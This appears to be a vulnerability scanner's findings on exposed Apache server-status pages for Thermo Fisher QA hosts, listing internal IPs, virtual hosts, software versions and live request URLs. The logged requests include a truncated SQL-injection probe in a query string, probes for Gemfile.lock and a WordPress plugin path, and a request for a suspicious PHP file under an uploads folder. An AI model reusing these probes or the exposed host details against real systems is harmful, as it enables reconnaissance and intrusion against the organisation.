10.253.106.168http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 10-0204640/493/48289R 1.513261034796540.02.42578.31 10.253.106.168http/1.1 11-02187614/143/58756K 0.4363301735369.73.03306.13 10.253.106.191http/1.1qa1-designsystem.thermofisher.cPOST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1 12-0-0/0/47550. 0.00275034565820.00.00426.06 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 13-0274560/74/48439_ 0.351861232933850.00.94301.36 10.253.106.168http/1.1 14-0163190/41/50764R 0.123711041804750.00.20494.04 10.253.106.191http/1.1 15-0-0/0/58296. 0.00272034301280.00.00404.40 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 16-02516431/105/96504K 0.632103664688287.71.38372.93 10.253.106.168http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/src/Gemfile.lock HTTP/1.1 17-0184790/125/47753_ 0.4017013134592640.01.96334.93 10.253.106.191http/1.1 18-0230250/5/41991_ 0.012291429914740.00.01347.41 10.253.106.191http/1.1qa1.allergyinsider.com:80POST /wp-admin/admin-ajax.php HTTP/1.1 19-0196630/329/47990R 1.003781235150290.03.81478.78 10.253.106.191http/1.1 20-0218790/134/45321_ 0.31126035748660.00.63386.82 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/dataTablesRespons 21-0189920/113/49997R 0.403591239308220.00.92314.74 10.253.106.191http/1.1 22-0291580/64/47080R 0.163411131578070.00.20389.52 10.253.106.168http/1.1 23-02302619/19/44861K 0.0413411352782961.40.06356.24 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 24-0274582/74/46016K 0.271191033105385.60.66341.00 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-0225611/122/46440K 0.281531237460342.80.36344.09 10.253.106.168http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 26-01749714/63/47860K 0.155113503697133.02.42390.31 10.253.106.191http/1.1qa1-designsystem.thermofisher.cGET /akamai/sureroute-test-object.html HTTP/1.1 27-0137060/49/83434R 0.163911435475470.011.95368.89 10.253.106.191http/1.1 28-0225640/111/47571R 0.37274629541850.00.90301.40 10.253.106.168http/1.1 29-0225650/141/44475_ 0.4910236794120.09.43426.29 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/bootstrap.min.js HTTP/1.1 30-0189950/143/47836R 0.35285041397960.03.54366.99 10.253.106.191http/1.1 31-0230270/2/45084_ 0.002161128474590.00.00377.52 10.253.106.168http/1.1qa1-designsystem.thermofisher.cGET /api/search/attribute?versionid=*&tf_version=%27+and+(selec 32-0225660/102/45118_ 0.32152032246080.00.70306.60 10.253.106.191http/1.1 33-0137077/52/210484K 0.128512119004616.00.47445.45 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /wp-content/uploads/html2wp/2hfrn4givdpOtykLFUQDpoKkxXv.php 34-0185120/61/44703_ 0.14125036034840.00.76252.22 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-base/resources 35-0219290/50/45754R 0.17313144015880.00.97268.40 10.253.106.191http/1.1 36-0209783/85/42076K 0.33216360910315.60.81267.88 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 37-0230280/0/124307R 0.00428019736200.00.00322.10 10.253.106.191http/1.1 38-0256930/115/41182_ 0.27126731650940.00.71322.72 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-image 39-0225690/80/41392_ 0.25126030607780.01.12308.55 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/slick_carousel.mi 40-0185130/28/42544_ 0.081261131133210.00.14337.49 10.253.106.168http/1.1 41-0209820/163/43921_ 0.531581333613500.04.84305.21 10.253.106.168http/1.1qa1-designsystem.thermofisher.cPOST /wp-admin/admin-ajax.php HTTP/1.1 42-0163200/36/42538_ 0.14821234606960.01.38382.81 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins 43-0256950/72/39843_ 0.211131928325770.03.58310.28 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/allergen_fact_she 44-0230290/0/40642R 0.00428027830250.00.00360.45 10.253.106.168http/1.1 45-0185140/33/42416_ 0.08761035651130.00.17418.22 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 46-0-0/0/40437. 0.00294029170810.00.00312.80 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0299610/283/42866_ 0.901263929205060.01.38291.26 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/jquery.min.js HTT 48-0256960/95/38164R 0.333521329271720.02.00312.49 10.253.106.168http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cbe3a5d74
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Saturday, 08-Jun-2024 13:04:46 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 31 days 23 hours 4 minutes 56 seconds Server load: 0.05 0.06 0.07 Total accesses: 4341493 - Total Traffic: 29.7 GB - Total Duration: 295333159 CPU Usage: u46.32 s210.83 cu5246.87 cs5203.82 - .388% CPU load 1.57 requests/sec - 11.3 kB/second - 7.2 kB/request - 68.0257 ms/request 41 requests currently being processed, 37 idle workers KRK_KRR.K.K._K.K...K._K.RK___.._.RW_____._R..W.__K.___R.K_K____. .__._.__K.____KKKK_KKK._...._.RK.RKKK_.KR.R_KR.................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0267551/1/45312K 0.00300034753130.40.00254.62 100.70.7.81http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 1-0267560/0/46716R 0.00600030728080.00.00313.79 10.253.106.168http/1.1 2-0216683/172/128932K 0.6311410291126993.31.29422.22 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-0272760/639/45312_ 1.5329689340130310.01.92356.62 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 4-02349617542/17904/59376K 17.3110361578532368.533.43377.05 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-0267570/0/55450R 0.00600034525450.00.00688.11 10.253.106.168http/1.1 6-0135520/1508/43249R 3.504032535433230.04.49561.59 10.253.106.191http/1.1 7-0-0/0/44614. 0.001331037791130.00.00336.63 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-03261335/435/47706K 0.9911711373414782.11.31402.99 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-0-0/0/51258. 0.001332032921010.00.00314.81 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 10-021941/695/45555K 1.73300033111440.42.26564.25 100.70.4.142http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 11-0-0/0/56679. 0.001334029081770.00.00292.96 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 12-0238990/199/45087_ 0.59761133434960.00.90414.96 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 13-0562848/389/46736K 0.90236113202528111.80.98292.22 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 14-0-0/0/48402. 0.001913040574120.00.00481.29 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 15-081881/1086/56371K 2.59981133489262.23.59388.94 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 16-0-0/0/94226. 0.001336032974660.00.00358.26 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-0-0/0/45623. 0.001434033554030.00.00325.99 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-0-0/0/39964. 0.001031028710560.00.00338.91 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-0216734/264/45613K 0.572261333964938.80.61464.34 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 20-0-0/0/42979. 0.001855034574660.00.00374.39 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0253540/168/46980_ 0.3723165538048800.00.40298.76 10.253.106.191http/1.1 22-01879144/2137/44771K 5.3223712303913397.97.08376.93 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 23-0-0/0/42341. 0.001929033684570.00.00342.84 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0326190/325/43747R 0.88382332120670.01.26330.82 10.253.106.191http/1.1 25-02727761/456/43620K 1.03296113616131150.01.53328.73 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 26-0253550/77/45150_ 0.1529644733238990.00.26376.57 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-0253560/3/81438_ 0.0022715633956690.00.18327.77 10.253.106.168http/1.1 28-054400/140/45480_ 0.492331227957110.01.03288.80 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 29-0-0/0/41737. 0.001339034925470.00.00403.81 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 30-0-0/0/45036. 0.001942039439280.00.00353.15 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0239020/689/42645_ 1.622241127119310.04.70363.65 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 32-0-0/0/42914. 0.001645030607810.00.00289.27 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-0219290/86/207614R 0.1841759783400.00.20428.92 10.253.106.168http/1.1 34-0394923/647/41853W 1.5100344813151.72.22230.08 10.253.106.168http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 35-0308790/1706/43345_ 4.49771342638370.09.45253.80 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-0219300/252/40536_ 0.6836612935229490.01.00262.46 10.253.106.191http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.css?v= HTT 37-0253570/106/122121_ 0.221121218488510.00.34312.27 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 38-0219330/275/38954_ 0.83380230577430.01.57306.55 10.253.106.191http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2023.3.0.c 39-0261390/603/39300_ 1.82235127729593610.02.63299.53 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-0-0/0/41045. 0.001943029795360.00.00326.35 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0219340/285/41658_ 0.6629655131835410.03.61290.14 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-0326210/427/39974R 0.9547511233284560.01.06369.81 10.253.106.168http/1.1 43-0-0/0/38264. 0.001328027529060.00.00298.97 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0-0/0/38865. 0.001333027002480.00.00347.44 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-02535992/118/40561W 0.26003434023207.40.26407.45 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 46-0-0/0/39007. 0.001644028340420.00.00305.14 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0253600/47/40848_ 0.102355528187360.00.20282.76 10.253.106.191http/1.1qa1.allergyinsider.com:80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cb790d3ac
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 06-Jun-2024 04:16:52 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 29 days 14 hours 17 minutes 3 seconds Server load: 0.01 0.04 0.01 Total accesses: 3750680 - Total Traffic: 26.7 GB - Total Duration: 264304076 CPU Usage: u90.12 s299.09 cu4595.32 cs4315.04 - .364% CPU load 1.47 requests/sec - 11.0 kB/second - 7.5 kB/request - 70.4683 ms/request 40 requests currently being processed, 35 idle workers R_.._...K..R_.._R___.._R._K.K__W_.._.KK.K.R_._.KR.K____KK._.KKRK R__...__.RK.______.K.K.KKK_K.KK_KK_RRKK_RK_..................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-09120/490/39730R 1.073461031370040.01.72227.13 10.253.106.222http/1.1 1-0319750/1286/39577_ 3.09162827384250.04.67281.86 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/dataTablesResponsive.min.cs 2-0-0/0/122183. 0.00962025621220.00.00374.57 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 3-0-0/0/38087. 0.00765036574550.00.00324.92 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 4-09620/545/41216_ 1.313211034344560.01.69342.83 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 5-0-0/0/41194. 0.00449033160160.00.00658.59 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 6-0-0/0/38237. 0.00448032933220.00.00539.51 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-0-0/0/37556. 0.00956034307080.00.00301.71 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-02216545/64/40636K 0.15201113390074231.80.27356.21 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-0-0/0/43899. 0.00763025611590.00.00286.12 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 10-0-0/0/39183. 0.00457030116920.00.00532.32 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 11-0275510/352/48813R 0.81393135125568060.00.98260.84 10.253.106.222http/1.1 12-0191690/119/38252_ 0.231591127967340.00.26362.91 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 13-0-0/0/39953. 0.00453029145970.00.00258.55 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 14-0-0/0/41656. 0.00712037241150.00.00444.96 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 15-010320/787/51406_ 1.79178030406300.06.02362.73 10.253.106.164http/1.1 16-0176210/260/86720R 0.7142422629405500.01.04322.12 10.253.106.222http/1.1 17-0148310/233/39276_ 0.503421830524820.01.08300.25 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/bootstrap-multiselect.min.j 18-0259500/382/34354_ 0.911173025872650.01.03276.68 10.253.106.164http/1.1 19-0144390/2232/38190_ 5.13451130414870.08.30430.26 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 20-0-0/0/37658. 0.00343032258200.00.00345.66 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0-0/0/40285. 0.00460034820870.00.00269.78 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 22-0144400/2207/38825_ 5.11162127655490.09.20356.51 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/dataTables.min.css HTTP/1.1 23-0191710/217/37693R 0.673471131375780.01.14319.13 10.253.106.222http/1.1 24-0-0/0/38222. 0.00455029507340.00.00290.90 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-0196420/1078/37548_ 2.43342830374560.02.64301.65 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/commercial 26-02755345/516/39121K 1.1322322679446337.91.66288.23 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-site.min.js HT 27-0-0/0/74552. 0.00451029253560.00.00296.60 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-02216775/138/39125K 0.292581232486686241.30.38243.63 10.253.106.164http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/fact-sheets/total-transportation- 29-0148370/415/35833_ 1.081921431808610.01.53351.31 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 30-0221680/36/38945_ 0.074054736386900.00.08328.91 10.253.106.222http/1.1 31-0148387/186/37833W 0.380024764288.00.52337.73 10.253.106.222http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 32-0191720/221/36291_ 0.711171127337330.01.44259.73 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-0-0/0/202870. 0.0089707301130.00.00398.35 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-0-0/0/35830. 0.00458031174760.00.00202.38 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-0216480/1806/35993_ 4.09156039121470.05.31225.37 10.253.106.164http/1.1 36-0-0/0/35106. 0.00461031573580.00.00232.74 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-01030612/103312/114602K 89.77130151547724.1188.86278.71 10.253.106.222http/1.1qa1.unitylabservices.com:80GET /server HTTP/1.1 38-01762443/287/33375K 0.6319211278549998.20.75284.90 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 39-0-0/0/33830. 0.00860027057860.00.00279.37 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-02164965/1660/34955K 4.0345142530006172.139.63298.05 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0-0/0/35025. 0.00447028703280.00.00257.00 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-0191730/152/33253R 0.304621030347200.04.63344.28 10.253.106.222http/1.1 43-0275620/955/33349_ 2.39441225050230.03.24279.01 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-0-0/0/33802. 0.00896024614200.00.00317.37 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-0221730/4/36317_ 0.003830730829860.00.01390.73 10.253.106.222http/1.1 46-0-0/0/33029. 0.00711025537810.00.00283.71 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0275643/727/33295K 1.8110519246547021.72.03246.33 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/bootstrap.min.js HTTP/1.1 48-0191740/191/30818R 0.424621225194220.05.00282.28 10.253.106.164http/1.1 49-0-0/0/35761. 0.00459
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c0b072758
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Tuesday, 04-Jun-2024 02:33:08 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 27 days 12 hours 33 minutes 19 seconds Server load: 0.33 0.18 0.10 Total accesses: 3169711 - Total Traffic: 23.7 GB - Total Duration: 232301215 CPU Usage: u134.37 s348.32 cu3990.43 cs3459.79 - .334% CPU load 1.33 requests/sec - 10.5 kB/second - 7.8 kB/request - 73.2878 ms/request 51 requests currently being processed, 40 idle workers _KWR_________KR_RK_R_KK__K______KK_..K__K_K_KKKKK._KKKK___RK_KKR ._RK_RKKRKKKR__RRR_.KKK.__.RKKK_.R........_..................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0265350/490/33668_ 1.1219119828334540.01.26205.49 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 1-0265368/536/33813K 1.23203751241479717.61.87259.80 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 2-02550717/371/114921W 0.9300210221637.31.01344.60 10.253.106.203http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 3-0255080/354/32275R 0.78319106733791850.00.90289.16 10.253.106.226http/1.1 4-0227040/2551/35401_ 5.85191228037500.07.95319.48 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 5-0238830/2290/35135_ 5.031469229908600.06.27293.23 10.253.106.203http/1.1 6-0304830/49/33365_ 0.15191229501620.00.25500.27 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-0236100/2452/30660_ 5.921968630859750.010.46268.13 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 8-057140/1711/34422_ 3.7191629754060.04.37333.07 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-recen 9-0268050/952/38226_ 2.0066821717860.02.20259.12 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/phadia_hea 10-0206270/1560/34529_ 3.5871126365660.05.50512.75 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 11-0178280/626/42906_ 1.3766022662140.01.91240.65 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-magni 12-03080/18/32161_ 0.0266724752460.00.04339.78 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/phadia_foo 13-02550911/466/33656K 1.01111247098724.22.16235.91 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 14-057150/1958/35664R 4.6631949933609010.016.66403.09 10.253.106.226http/1.1 15-0163880/2648/46154_ 5.87665527442920.07.86336.53 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/clientlib-all.min.css HTTP/1.1 16-0274060/1532/81592R 4.014351126623590.05.41303.68 10.253.106.226http/1.1 17-0285715/1291/33667K 3.061712275601311.15.59262.28 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 18-0274070/824/29429_ 1.94141223237890.02.65258.11 10.253.106.203http/1.1 19-0309590/743/31744R 1.5931931927220280.02.01406.38 10.253.106.226http/1.1 20-0285750/967/31553_ 2.101972929218960.02.68313.23 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 21-037531/331/34320K 0.7428311316176468.61.24240.91 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 22-0255112/358/32753K 0.8520310024225614.60.85332.32 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 23-0218550/1801/31608_ 4.0466828052350.05.22293.89 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/url-polyfill.min.js HTTP/1. 24-0265370/301/31655_ 0.7166025459880.00.87253.53 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-recen 25-025923/3/30802K 0.002561125762276.50.01266.49 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 26-0253100/1438/33930_ 3.3491823900930.07.44263.49 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/commercial 27-03760/5/68061_ 0.0066626195780.00.01269.03 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/phadia_hea 28-0285760/1024/32893_ 2.21911621825770.02.45215.33 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/tooltip/tooltipster.bundle. 29-0285770/1437/29583_ 3.16141228643510.03.80326.05 10.253.106.203http/1.1 30-0218560/1565/33090_ 3.551975833573530.04.32287.34 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 31-0116970/1494/31405_ 3.5891721281870.04.61310.01 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/commercial 32-02593103/103/30621K 0.2291102442922233.10.23237.99 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-01767022011/87930/186997K 82.1111625354161573.1159.92366.16 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-03780/44/30145_ 0.10913428095210.00.12181.62 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/bootstrap.min.css HTTP/1.1 35-0-0/0/30897. 0.0013034221210.00.00207.64 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0-0/0/29695. 0.0011026322560.00.00213.48 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-01030622012/87678/98968K 72.03501419671161575.3158.20248.05 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0178250/1607/28260_ 3.551947424617080.05.85200.68 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 39-0274090/702/28199_ 1.50151122874320.01.67237.07 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-0265381/373/28596K 0.792295622396922.20.98243.94 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-03800/100/28677_ 0.2266624995320.00.23196.69 10.253.106.226http/1.1qa1.allergyinsider.com:80GET 